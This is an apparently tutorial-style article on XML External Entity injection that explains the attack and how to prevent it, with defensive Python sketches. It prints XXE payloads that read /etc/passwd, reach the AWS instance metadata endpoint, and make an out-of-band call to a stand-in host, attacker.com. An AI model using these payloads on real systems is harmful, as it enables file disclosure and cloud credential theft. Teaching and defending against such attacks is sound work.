XML External Entities (XXE) Injection

XXE (XML External Entity) injection is a common vulnerability in web applications that parse XML. In this article, we explore how an attacker can exploit this vulnerability and how it can be prevented. Before going further into what an XXE attack is, it helps to understand the basics of XML.

What are XML External Entities (XXE) attacks?

At this point, we assume that you already know what an XML external entity is. Some web applications are vulnerable in a way that lets an attacker interfere with how XML data is processed. By taking advantage of this, the attacker may be able to read files on the server that hosts the application and, in some cases, make that server send requests to other systems, which is an SSRF (server-side request forgery) attack.

Exploiting XXE vulnerabilities

There are several ways an attacker can exploit XXE vulnerabilities.

Retrieving files

The most common use of XXE is retrieving files. On a Unix-like operating system, the attacker may target the passwd file. This file is located at /etc/passwd and contains information about the user accounts registered on the system.

Suppose that a web application that sells books uses XML to receive the book’s title, like this.

<?xml version="1.0" encoding="UTF-8"?>
<book><title>Example Book</title></book>

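The attacker can replace this XML with the following payload, which declares an external entity pointing at the passwd file and references it in the title. If the parser resolves external entities and the application echoes the title back, the response contains the contents of the file.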

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>
<book><title>&passwd;</title></book>
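To make the structure of this payload concrete, here is a minimal Python sketch that lists the external entities a document declares without resolving any of them. It uses the standard library's expat bindings; the function name `list_external_entities` and the `PAYLOAD` constant are hypothetical names chosen for illustration, not part of any application discussed here.

```python
import xml.parsers.expat

# The payload from the text above, as bytes.
PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE book [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>\n'
    b'<book><title>&passwd;</title></book>'
)


def list_external_entities(data):
    """Return (name, system_id) for every external entity declared in data.

    Nothing is fetched: no external entity handler is installed, so the
    parser only reports the declarations it sees.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system id.
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)
    return found


if __name__ == "__main__":
    print(list_external_entities(PAYLOAD))
```

Run against the original book request, the same function returns an empty list, because that document has no DOCTYPE and declares no entities.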

Performing SSRF

As stated before, an XXE vulnerability can also be used as a gateway to local or back-end services. The process is very similar to the previous one: instead of retrieving a file, the entity points at a URL that only the server hosting the web app can reach. On AWS, for example, this can be http://169.254.169.254/latest/meta-data/, which is the EC2 instance metadata endpoint.

The XML file will look like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE url [ <!ENTITY local SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<url><title>&local;</title></url>
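What makes this payload an SSRF attempt is the address it targets. As a rough sketch, the check below flags system identifiers whose host is a literal link-local, loopback, or private IP address. The function name `targets_internal_address` is hypothetical, and the sketch deliberately ignores host names that resolve to internal addresses, so it is an illustration rather than a complete filter.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_address(system_id):
    """Return True if the URL's host is a literal internal IP address."""
    host = urlsplit(system_id).hostname
    if host is None:
        # For example file:///etc/passwd, which has no host part.
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A host name rather than an IP literal; resolving it is out of
        # scope for this sketch.
        return False
    return addr.is_link_local or addr.is_loopback or addr.is_private


if __name__ == "__main__":
    print(targets_internal_address("http://169.254.169.254/latest/meta-data/"))
```

The metadata address 169.254.169.254 falls in the link-local range, which is why it is reachable from the server itself but not from the attacker's machine.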

In some cases, XXE vulnerabilities are blind, meaning that the attacker cannot see the value of the entity in the response. Even when the application returns nothing, or returns something other than what the attacker expected, an XXE vulnerability may still exist. To detect it, you can use out-of-band techniques. Sometimes it is also possible to trigger errors that expose sensitive data.

If this is the case, the attacker can try a server under his or her own control. To do that, the entity in the XML file points at the attacker-controlled website like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE url [ <!ENTITY website SYSTEM "https://attacker.com/"> ]>
<url><title>&website;</title></url>

If the parser resolves the entity, the back-end server sends a request to the attacker’s website, and that incoming request confirms the vulnerability even though nothing shows up in the application’s response. This is known as the OAST (Out-of-band Application Security Testing) technique.
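The receiving side of an out-of-band check can be as small as a web server that records who contacted it. The following is a minimal sketch using Python's standard http.server module, meant for testing systems you are authorized to assess. The names `CallbackHandler`, `start_listener`, and `seen_requests` are hypothetical, and a real engagement would more likely use a dedicated OAST service.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Each entry is (client_ip, requested_path); any entry is evidence that
# some remote parser resolved an entity pointing at this listener.
seen_requests = []


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record the interaction before answering.
        seen_requests.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        # Keep stderr quiet; interactions are kept in seen_requests instead.
        pass


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread and return the server.

    Port 0 asks the operating system for any free port; the chosen port
    is available as server.server_address[1].
    """
    server = HTTPServer((host, port), CallbackHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
```

Using a unique path per test case (for example a random token) makes it possible to tell which payload triggered which callback.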

Modifying Content Type

XXE can sometimes be reached through a POST request that does not normally carry XML. The Content-Type request header declares the format of the request body. Most form submissions will have something like this.

Content-Type: application/x-www-form-urlencoded

Some applications also accept other content types, such as XML. If so, changing the header to the following should also work.

Content-Type: text/xml

So the following request can be modified to something like this.

Original:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded

abcd

Modified:

POST /action HTTP/1.0
Content-Type: text/xml

<?xml version="1.0" ?><book><title>test</title></book>

The attacker can then replace the request body with one of the payloads shown earlier, or with any other XXE payload.
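Seen from the server side, this trick only works when the endpoint accepts content types it was never meant to handle. A minimal sketch of an allowlist check, assuming a hypothetical endpoint that should only ever receive form data, could look like this (`media_type`, `accepts_request`, and `ALLOWED_TYPES` are illustrative names):

```python
# Content types this hypothetical endpoint is meant to handle.
ALLOWED_TYPES = frozenset({"application/x-www-form-urlencoded"})


def media_type(content_type_header):
    """Return the bare media type, lowercased, without parameters."""
    return content_type_header.split(";", 1)[0].strip().lower()


def accepts_request(content_type_header, allowed=ALLOWED_TYPES):
    """Return True only for content types on the allowlist."""
    return media_type(content_type_header) in allowed


if __name__ == "__main__":
    print(accepts_request("application/x-www-form-urlencoded"))
    print(accepts_request("text/xml"))
```

With a check like this in front of the handler, the modified request above would be rejected before its body reaches any XML parser.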

Preventing XXE

The most reliable way to prevent XXE is to disable the dangerous features of the XML parsing library, in particular the resolution of external entities. Where the application does not need them, developers can also disable DTDs completely; how to do this depends on the parser the web application uses. Each programming language relies on different XML parser libraries, so it is a good idea to follow the XXE prevention guidance for the specific parser in use.
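As one illustration of disabling DTDs completely, the sketch below uses Python's standard expat bindings and refuses any document that contains a DOCTYPE declaration, so no entity can be declared in the first place. The names `DTDForbidden` and `parse_titles_without_dtd` are hypothetical, and the book/title structure is taken from the earlier example. Other parsers expose different switches, so treat this as one possible approach rather than a general recipe.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_titles_without_dtd(data):
    """Return the text of every <title> element, rejecting any DTD."""
    titles = []
    buffer = []
    state = {"in_title": False}

    def on_start_doctype(name, system_id, public_id, has_internal_subset):
        # Abort as soon as a DOCTYPE appears, before any entity is declared.
        raise DTDForbidden("DOCTYPE %r is not allowed" % name)

    def on_start_element(name, attrs):
        if name == "title":
            state["in_title"] = True
            buffer.clear()

    def on_end_element(name):
        if name == "title":
            titles.append("".join(buffer))
            state["in_title"] = False

    def on_character_data(text):
        # Text may arrive in several chunks, so collect it in a buffer.
        if state["in_title"]:
            buffer.append(text)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_start_doctype
    parser.StartElementHandler = on_start_element
    parser.EndElementHandler = on_end_element
    parser.CharacterDataHandler = on_character_data
    parser.Parse(data, True)
    return titles
```

The original book request parses normally with this function, while the file-retrieval payload raises `DTDForbidden` before the parser ever sees the entity reference.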